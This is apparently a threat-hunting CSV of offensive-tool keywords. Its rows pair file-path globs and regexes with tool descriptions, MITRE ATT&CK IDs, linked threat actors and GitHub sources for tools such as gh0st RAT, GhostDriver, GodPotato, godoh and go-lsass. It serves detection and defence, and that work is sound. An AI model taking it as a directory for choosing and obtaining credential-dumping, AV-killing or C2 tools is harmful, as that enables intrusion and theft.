"*\GetWmiObjectCommand.cs",".{0,1000}\\GetWmiObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15623"
"*\gfscgsvs.log*",".{0,1000}\\gfscgsvs\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15624"
"*\gh0st.exe*",".{0,1000}\\gh0st\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","15625"
"*\ghauri\ghauri\*",".{0,1000}\\ghauri\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","15626"
"*\ghauri-1*\ghauri\*",".{0,1000}\\ghauri\-1.{0,1000}\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","15627"
"*\GhostDriver.exe*",".{0,1000}\\GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","15628"
"*\ghostdriver.sys*",".{0,1000}\\ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","15629"
"*\GhostDriver-main\*",".{0,1000}\\GhostDriver\-main\\.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","15630"
"*\GhostMapper.sln*",".{0,1000}\\GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","15631"
"*\GhostMouse.exe*",".{0,1000}\\GhostMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15632"
"*\ghostsocks-master*",".{0,1000}\\ghostsocks\-master.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","15633"
"*\GhostTask.h*",".{0,1000}\\GhostTask\.h.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15634"
"*\GhostTask\*",".{0,1000}\\GhostTask\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15635"
"*\GhostTask-1.0\*",".{0,1000}\\GhostTask\-1\.0\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15636"
"*\GhostTask-main*",".{0,1000}\\GhostTask\-main.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","15637"
"*\glit.exe*",".{0,1000}\\glit\.exe.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","15638"
"*\glit-cli*",".{0,1000}\\glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","15639"
"*\GlllPowerLoader.py*",".{0,1000}\\GlllPowerLoader\.py.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","15640"
"*\GlllPowerLoader-master*",".{0,1000}\\GlllPowerLoader\-master.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","15641"
"*\gmailC2.exe*",".{0,1000}\\gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","15642"
"*\gmer.exe*",".{0,1000}\\gmer\.exe.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","15643"
"*\gmer64.pdb*",".{0,1000}\\gmer64\.pdb.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","15644"
"*\gmer64.sys*",".{0,1000}\\gmer64\.sys.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","15645"
"*\GMSAPasswordReader.*",".{0,1000}\\GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15646"
"*\GMSAPasswordReader.*",".{0,1000}\\GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15647"
"*\GMSAPasswordReader.exe*",".{0,1000}\\GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","15648"
"*\GMSAPasswordReader.exe*",".{0,1000}\\GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15649"
"*\GoAWSConsoleSpray-master*",".{0,1000}\\GoAWSConsoleSpray\-master.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","15650"
"*\gocrack-1.0.zip*",".{0,1000}\\gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","15651"
"*\gocrack-master.*",".{0,1000}\\gocrack\-master\..{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","15652"
"*\GodFault.*",".{0,1000}\\GodFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","15653"
"*\godoh\cmd\*",".{0,1000}\\godoh\\cmd\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15654"
"*\godoh\dnsclient\*",".{0,1000}\\godoh\\dnsclient\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15655"
"*\godoh\dnsserver*",".{0,1000}\\godoh\\dnsserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15656"
"*\godoh\lib\*",".{0,1000}\\godoh\\lib\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15657"
"*\godoh\protocol\*",".{0,1000}\\godoh\\protocol\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","15658"
"*\GodPotato.exe*",".{0,1000}\\GodPotato\.exe.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15659"
"*\GodPotato.exe*",".{0,1000}\\GodPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15660"
"*\Godpotato\*",".{0,1000}\\Godpotato\\.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","15661"
"*\GodPotato\pipe\epmapper*",".{0,1000}\\GodPotato\\pipe\\epmapper.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#namedpipe","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","15662"
"*\Godzilla.java*",".{0,1000}\\Godzilla\.java.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15663"
"*\Godzilla-BypassOpenRasp.jar*",".{0,1000}\\Godzilla\-BypassOpenRasp\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15664"
"*\gofetch.exe*",".{0,1000}\\gofetch\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","15665"
"*\GoFetchLog.log*",".{0,1000}\\GoFetchLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","15666"
"*\GoFetch-main*",".{0,1000}GoFetch\-master.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","15667"
"*\Golden.ps1*",".{0,1000}\\Golden\.ps1.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","0","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","15668"
"*\goldenPac.py*",".{0,1000}\\goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","15669"
"*\goldenPac.py*",".{0,1000}\\goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15670"
"*\go-lsass.exe*",".{0,1000}\\go\-lsass\.exe.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","15672"
"*\go-lsass-master.zip*",".{0,1000}\\go\-lsass\-master\.zip.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","15673"
"*\go-lsass-master\*",".{0,1000}\\go\-lsass\-master\\.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","15674"
"*\google_drive_doubledrive.py*",".{0,1000}\\google_drive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15680"
"*\Gopher.exe*",".{0,1000}\\Gopher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15681"
"*\Gopher.pdb*",".{0,1000}\\Gopher\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15682"
"*\go-secdump*",".{0,1000}\\go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","15683"
"*\gosecretsdump*",".{0,1000}\\gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","15684"
"*\gosecretsdump.*",".{0,1000}\\gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15685"
